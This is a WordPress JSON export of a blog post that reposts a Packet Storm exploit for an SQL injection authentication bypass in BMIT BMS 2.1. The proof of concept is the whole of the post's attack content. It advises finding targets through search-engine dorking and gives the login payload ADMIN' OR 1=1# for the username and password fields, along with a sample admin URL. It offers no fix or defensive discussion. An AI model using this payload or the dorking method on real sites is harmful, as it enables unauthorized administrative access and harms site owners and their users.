{"id":45683,"date":"2023-07-27T19:53:13","date_gmt":"2023-07-27T15:53:13","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/173785\/bmitbms21-sql.txt"},"modified":"2023-08-02T13:32:56","modified_gmt":"2023-08-02T09:02:56","slug":"bmit-bms-2-1-sql-injection","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/bmit-bms-2-1-sql-injection\/","title":{"rendered":"BMIT BMS 2.1 SQL Injection"},"content":{"rendered":"<dl id=\"F173785\" class=\"file first\">\n<dt><a class=\"ico text-plain\" title=\"Size: 1.2 KB\" href=\"https:\/\/packetstormsecurity.com\/files\/download\/173785\/bmitbms21-sql.txt\" target=\"_blank\" rel=\"noopener\"><strong>BMIT BMS 2.1 SQL Injection<\/strong><\/a><\/dt>\n<dd class=\"datetime\">Posted <a title=\"14:19:49 UTC\" href=\"https:\/\/packetstormsecurity.com\/files\/date\/2023-07-27\/\" target=\"_blank\" rel=\"noopener\">Jul 27, 2023<\/a><\/dd>\n<dd class=\"refer\">Authored by <a class=\"person\" href=\"https:\/\/packetstormsecurity.com\/files\/author\/7697\/\" target=\"_blank\" rel=\"noopener\">indoushka<\/a><\/dd>\n<dd class=\"detail\">BMIT BMS version 2.1 suffers from a remote SQL injection vulnerability that allows for authentication bypass.<\/dd>\n<dd class=\"tags\">tags | <a href=\"https:\/\/packetstormsecurity.com\/files\/tags\/exploit\" target=\"_blank\" rel=\"noopener\">exploit<\/a>, <a href=\"https:\/\/packetstormsecurity.com\/files\/tags\/remote\" target=\"_blank\" rel=\"noopener\">remote<\/a>, <a href=\"https:\/\/packetstormsecurity.com\/files\/tags\/sql_injection\" target=\"_blank\" rel=\"noopener\">sql injection<\/a><\/dd>\n<dd class=\"md5\">SHA-256 | <code>6c44b20654cc1ac0bd5815441e8f32129376fb466e937a80b8c808e94f6eee08<\/code><\/dd>\n<dd class=\"act-links\"><a title=\"Size: 1.2 KB\" href=\"https:\/\/packetstormsecurity.com\/files\/download\/173785\/bmitbms21-sql.txt\" rel=\"nofollow noopener\" target=\"_blank\">Download<\/a> | <a class=\"fav\" href=\"https:\/\/packetstormsecurity.com\/files\/favorite\/173785\/\" rel=\"nofollow noopener\" target=\"_blank\">Favorite<\/a> | <a href=\"https:\/\/packetstormsecurity.com\/files\/173785\/BMIT-BMS-2.1-SQL-Injection.html\" target=\"_blank\" rel=\"noopener\">View<\/a><\/dd>\n<\/dl>\n<div class=\"src\">\n<pre><code>====================================================================================================================================\r\n| # Title : BMIT BMS 2.1 Auth BY Pass Vulnerability |\r\n| # Author : indoushka |\r\n| # Tested on : windows 10 Fran\u00e7ais V.(Pro) \/ browser : Mozilla firefox 69.0(32-bit) | \r\n| # Vendor : https:\/\/www.bmitsolution.in\/softtware_development.php | \r\n====================================================================================================================================<\/code><\/pre>\n<p>poc :<\/p>\n<pre><code><\/code><\/pre>\n[+] Dorking \u0130n Google Or Other Search Enggine.<\/p>\n<pre><code><\/code><\/pre>\n[+] use payload : user &amp; pass : ADMIN&#8217; OR 1=1#<\/p>\n<pre><code><\/code><\/pre>\n[+] http:\/\/127.0.0.1\/wwrbsgroupofinstitutioncom\/admin\/index.php<\/p>\n<pre><code><\/code><\/pre>\n<p>Greetings to :=================================================================<br \/>\njericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |<br \/>\n===============================================================================<\/p>\n<pre><code><\/code><\/pre>\n<p>&nbsp;<\/p>\n<pre><code><\/code><\/pre>\n<\/div>\n","protected":false},"excerpt":{"rendered":"<p>BMIT BMS 2.1 SQL Injection Posted Jul 27, 2023 Authored by indoushka BMIT BMS version 2.1 suffers from a remote SQL injection vulnerability that allows for authentication bypass. tags | exploit, remote, sql injection SHA-256 | 6c44b20654cc1ac0bd5815441e8f32129376fb466e937a80b8c808e94f6eee08 Download | Favorite | View ==================================================================================================================================== | # Title : BMIT BMS 2.1 Auth BY Pass Vulnerability | &hellip;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-45683","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/45683","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=45683"}],"version-history":[{"count":2,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/45683\/revisions"}],"predecessor-version":[{"id":45960,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/45683\/revisions\/45960"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=45683"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=45683"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=45683"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}